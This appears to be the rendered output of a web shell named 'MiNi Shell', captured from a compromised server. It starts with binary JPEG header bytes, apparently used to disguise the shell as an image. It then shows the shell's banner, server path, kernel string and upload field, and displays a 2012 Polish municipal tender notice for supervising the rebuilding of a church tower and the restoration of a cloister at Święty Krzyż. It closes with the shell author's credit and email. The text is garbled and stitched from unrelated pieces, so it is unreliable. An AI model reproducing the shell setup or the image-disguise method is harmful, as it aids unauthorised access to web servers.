JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120924/361382-N-2012.html

<p class="kh_header"><b>Bieliny: Pełnienie nadzoru inwestorskiego na zadaniach pn. Odbudowa wieży kościelnej na Świętym Krzyżu oraz remont i konserwacja wirydarza zabytkowego na Świętym Krzyżu.</b><br>
<b>Numer ogłoszenia: 361382 - 2012; data zamieszczenia: 24.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieliny , ul. Partyzantów 17, 26-004 Bieliny, woj. świętokrzyskie, faks 041 3026107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bieliny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego na zadaniach pn. Odbudowa wieży kościelnej na Świętym Krzyżu oraz remont i konserwacja wirydarza zabytkowego na Świętym Krzyżu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.  Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego na zadaniach pn.
1. Odbudowa wieży kościelnej na Świętym Krzyżu
2. Remont i konserwacja wirydarza zabytkowego na Świętym Krzyżu.
Podstawowy zakres robót  budowlanych, dla których należy zapewnić nadzór, obejmuje:
Odbudowa wieży kościelnej na Świętym Krzyżu
1. Wyburzenia i demontaże:
- demontaż kręconych metalowych schodów na poziom chóru,
- demontaż pokrycia dachowego w części kryjącej podstawy wieży, orynnowania, blacharki,
- demontaż drewnianej więźby dachowej w części jw.
- wyburzenie sklepienia nad południowym przedsionkiem oraz sklepienie na poziomie chóru,
- rozbiórka części podstawy wieży w celu uzyskania projektowanego poziomu posadowania wieży,
- demontaż części kamieni elewacji frontowej funkcjonujących, jako tymczasowe zwieńczenie.
2. Roboty budowlane trzonu wieży:
- wykonanie żelbetowych wieńców wg rys. przekrojów,
- wykonanie żelbetowych stropów wg rys. projektu,
- wykonanie ścian wieży z ciosów kamiennych na kotwy ze stali nierdzewnej i zaprawy, z elementów przygotowanych poza placem budowy,
- gruntowanie kamienia,
- osadzenie stolarki okiennej i żaluzji.
3. Roboty montażowe hełmu
- skręcenie stalowych elementów konstrukcji przygotowanych poza placem budowy,
- mocowanie krążyn, łaceń i deskowania impregnowanego pod krycie blachą miedzianą,
- krycie blachą miedzianą hełmu i wykończenie blacharki,
- montaż krzyża i kuli,
- montaż odgromienia.
4. Roboty wykończeniowe:
- montaż balustrad, żaluzji i stolarki,
- wykonanie oświetlenia użytkowego we wnętrzach,
- wykonanie oświetlenia przeszkodowego na wieży. m                                                 
5. Wewnętrzne roboty wykończeniowe.
 - uzupełnienie tynków,
- montaż stalowych schodów,
- wykończenie wewnętrznych ścian wydzielenia na poz. parteru, chóru oraz strychu,
- osadzenie stolarki drzwiowej,
- wykonanie warstw nawierzchniowych z gresu antypoślizgowego i mrozoodpornego na stropach betonowych i balkonie widokowym.
Uwaga!
Próbki stosowanych materiałów należy uzgadniać z nadzorem autorskim w celu ustalenia kolorystyki i struktury materiału. W trakcie przygotowywania elementów kamieniarki należy określić wybrać istniejące ciosy zburzonej wieży i przygotować do montażu. Materiał kamieniarski co do złoża, struktury i kolorystyki określić w kontekście pozostałości elementów kamieniarskich po zburzonej wieży. W trakcie przygotowania elementów kamieniarki należy wybrać istniejące ciosy zburzonej wieży i przygotować do montażu - po konserwacji.

Remont i konserwacja wirydarza zabytkowego klasztoru na Świętym Krzyżu 
1. Roboty przygotowawcze i rozbiórkowe
- wykonanie rusztowań i osiatkowań,
- rozebranie obróbek blacharskich gzymsu pośredniego, parapetów okien piętra,
- odbicie tynków zewnętrznych w miejscach odspojeń na ścianach i profilach ciągnionych,
- rozkucie rys w gzymsach i przeszlifowanie,
- wykucie zniszczonych fragmentów obramowań okiennych oraz kamiennych studni w celu rekonstrukcji,
- demontaż okien pietra,
- rozebranie istniejącej posadzki z kamienia,
- wywóz gruzu.
2. Roboty budowlane, uzupełniające, renowacyjne, konserwatorskie.
2.1. Elewacje
- wykonanie ubytków w tynku,
- likwidacja pęknięć z uwzględnieniem siatki szerokości 20 cm,
- reperacja profili ciągnionych gzymsów,
- osadzenie nowej stolarki okiennej na piętrze,
- oczyszczenie i konserwacja profili kamiennych obramień okiennych pietra oraz osadzenie nowych zrekonstruowanych części,
- malowanie tynków farbami mineralnymi,
- wykonanie i montaż obróbek blacharskich z blachy tytanowo - cynkowej gr. 0,7 mm parapetów na piętrze i gzymsu pośredniego.
2.2. Okna piętra
- okna należy wykonać zgodnie z rysunkiem nr 8 po wcześniejszym obmiarze wielkości na budowie
2.3. Posadzka wirydarza
- powierzchnia z płyt z kamienia łamanego lub piłowanego o krawędziach łupanych na chudym betonie; płyty układać szczelnie i fugować na gładko,
- powierzchnia z kostki kwarcytowej o wymiarach ~ 6 x 6 x 6 cm
- obszar wokół cisu obsypać korą.
2.4. Studnia kamienna 
- odczyszczenie i uzupełnienie elementów cembrowiny kamiennej
- rekonstrukcja kołowrotu i pokrywy studni.
2.5. Studnia technologiczna.
- wymiana części drewnianych i oblachowania na blachę tytanowo - cynkową                                        
II. Wykonawca zobowiązany jest do:
1.	Zapewnienia nadzoru inwestorskiego na budowie,
2.	Udział w protokolarnym przekazaniu wykonawcy robót budowlanych terenu budowy,
3.	Kontroli wykonawcy robót budowlanych na podstawie dokumentacji projektowej - wykonawczej,
4.	Czuwanie nad realizacją harmonogramu,
5.	Koordynacji robót budowlanych wszystkich branż,
6.	Nadzoru nad prawidłowym przygotowaniem i złożeniem ewentualnych wniosków o zmianę pozwolenia na budowę,
7.	Uczestniczenia w rozruchu technologicznym wbudowanych maszyn i urządzeń,
8.	Dokonywania odbiorów technicznych w terminach określonych w umowie z wykonawcą robót budowlanych,
9.	Nadzoru na prawidłowym przygotowaniem i przekazaniem zawiadomienia o zakończeniu budowy i uzyskaniem ostatecznej decyzji o pozwoleniu na użytkowanie,
10.	 Sprawdzenia prawidłowości dokumentów przedkładanych przez wykonawcę robót budowlanych,
11.	 Obecność na budowie co najmniej 2 razy w tygodniu oraz na każde wezwanie Zamawiającego lub wykonawcy robót budowlanych i dokumentowanie swoich wizyt wpisem do dziennika budowy, z podaniem zakresu robót które zostały przez niego sprawdzone,
12.	 Sprawdzanie kosztorysów na roboty dodatkowe nieprzewidziane, konieczne i zamienne oraz kontrola prawidłowości ich fakturowania.
13.	 Koordynowanie prac inspektorów branżowych,
14.	 Stałe konsultowanie i fachowe doradztwo na rzecz Zamawiającego.
15.	 Współpraca z Zamawiającym, jednostką projektową i wykonawczą w zakresie realizowanych robót.
16.	 Innych czynności nie wymienionych powyżej, a zleconych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 4 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie oceniony na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie oceniony na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie oceniony na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowaniem
1. osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej wydane na podstawie ustawy z dnia 7 lipca 1994 roku - Prawo budowlane (Dz. U. z 2010 r Nr 243 poz. 1623 i posiadającą co najmniej 2 letnią praktykę zawodową zgodnie z § 24 ust. 2 Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego  z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych

Osoba ta winna wykazać,
- że pełniła funkcje kierownika budowy lub wykonała nadzór inwestorski nad realizacją przynajmniej jednej roboty budowlanej dotyczącej remontu lub przebudowy obiektu budowlanego wpisanego do rejestru zbytków o wartości co najmniej 2 000 000,00 zł
- odbyła co najmniej 2 letnia praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków lub posiada uprawnienia konserwatorskie.

2. osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wydane na podstawie ustawy z dnia 7 lipca 1994 roku - Prawo budowlane (Dz. U. z 2010 r Nr 243 poz. 1623 lub odpowiednie uprawnienia do kierowania robotami budowlanymi wydane na podstawie wcześniejszych przepisów.

Osoba ta winna wykazać:
- że wykonywała nadzór inwestorski nad realizacją co najmniej 1 roboty instalacyjnej w zakresie instalacji elektrycznych i teletechnicznych na obiektach kubaturowych.
3. osobą posiadającą wykształcenie wyższe ze specjalizacją Konserwacja i restauracja Rzeźby i Elementów Architektury.

Osoba ta winna wykazać:
- że wykonywała nadzór konserwatorski na realizacja lub była kierownikiem prac dotyczących konserwacji obiektów wpisanych do rejestru zabytków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie oceniony na podstawie złożonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu przewidzianego na zakończenie robót
zmiany spowodowane warunkami atmosferycznymi w szczególności:
-   klęski żywiołowe,
- warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów,
w przypadku odkrycia znaleziska wymagającego wykonania prac archeologicznych lub konserwatorskich
zmiana terminu rozpoczęcia i zakończenia robót budowlanych, z którym związany jest termin realizacji przedmiotu umowy - w zakresie wynikającym z tej zmiany.
w uzasadnionych przypadkach wystąpi konieczność zmiany osoby wskazanej w umowie, odpowiedzialnej za wykonanie przedmiotu umowy po stronie Wykonawcy, posiadającej wymagane kwalifikacje i uprawnienia, a osoba zaproponowana w zastępstwie przez Wykonawcę będzie posiadała kwalifikacje i uprawnienia co najmniej takie, jakie wymagane były przez Zamawiającego - zakresie zmiany tej osoby.
Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
w szczególności:
- wstrzymanie robót przez Zamawiającego;
- konieczność usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót.
Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową, w szczególności na skutek zlecenia Wykonawcy zamówień dodatkowych, zgodnie z przepisami odrębnymi;
Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
Zmiana obowiązującej stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bieliny.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bieliny
ul. Partyzantów 17
26-004 Bieliny
pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2012 godzina 10:00, miejsce: Urząd Gminy Bieliny
ul. Partyzantów 17
26-004 Bieliny
pokój nr 14 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com